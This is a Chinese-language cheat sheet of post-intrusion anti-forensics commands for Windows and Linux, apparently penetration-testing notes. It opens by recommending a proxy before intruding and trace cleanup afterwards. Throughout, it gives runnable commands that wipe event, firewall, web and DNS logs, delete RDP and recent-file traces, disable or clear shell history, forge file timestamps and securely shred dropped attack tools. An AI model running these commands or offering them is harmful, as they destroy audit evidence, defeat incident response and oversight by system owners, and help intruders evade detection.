痕迹清理

最好的手段是在渗透前挂上代理，然后在渗透后痕迹清除

Windows系统：

1：用MSF中的 clearev 命令清除痕迹

2：执行命令清除日志：　del %WINDR%\* .log /a/s/q/f

3、全量清理，windows主机三大核心【系统、安全、应用程序】日志清理

PowerShell -Command "& {Clear-Eventlog -Log Application,System,Security}"

4：远程连接日志清理：

如果3389远程登录过，需要清除mstsc痕迹

# 进入Default.rdp所在路径

cd %userprofile%\documents\

# 使用attrib去掉Default.rdp文件的，系统文件属性(S)；隐藏文件属性(H)

attrib Default.rdp -s -h

# 删除

del Default.rdp

5、防火墙日志清理

cd logfiles/firewall

del xxx.log

6、服务器日志清理

默认情况，在 %systemroot%\system32\logfles\ 下有FTP、IIS服务器等日志。

FTP日志默认位置：  %systemroot%\system32\logfiles\msftpsvc1\

WWW日志默认位置：  %systemroot%\system32\logfiles\w3svc1\

DNS日志默认位置：   %systemroot%\system32\config

Scheduler服务日志默认位置： %systemroot%\schedlgu.txt

7、近期访问记录清理

# 用户最近访问过的文件和网页记录

C:\Users\root\AppData\Local\Microsoft\Windows\History

# 近期访问过的文件

C:\Users\root\Recent

8、安全删除文件

利用cipher覆写文件

cipher /w:X # 其中X指盘符或文件具体位置

cipher /w:c:\users\root\desktop\flag.txt

9、安全隐藏文件

Powershell 修改文件时间戳

Function edit_time($path){$date1 =Get-ChildItem |
Select LastWriteTime|Get-Random;$date2 =Get-ChildItem |
Select LastWriteTime|Get-Random;$date3 =Get-ChildItem |
Select LastWriteTime|Get-Random;$(Get-Item
$path).lastaccesstime=$date1.LastWriteTime;
$(Get-Item $path).creationtime=$date2.LastWriteTime ;
$(Get-Item $path).lastwritetime=$date3.LastWriteTime};
edit_time("C:\Users\root\desktop\flag.txt")

Linux系统：

1：如果是Linux系统，在获取权限后，执行以下命令，不会记录输入过的命令：　export HISTFILE=/dev/null export HISTSIZE=0

隐藏远程ssh登录记录：ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash –i

当前shell终止history记录：set +o history 、 kill -9 $$

隐藏文件修改时间：touch -r A B (修改系统时间后执行效果更好)

2：删除 /var/log 目录下的日志文件。

3：如果是web应用，找到web日志文件，删除。

4、清理历史记录

history -c

5、安全删除文件，使用 shred 覆写一些渗透留下的文件：

shred -f -u -z -v -n 6 ew_for_linux64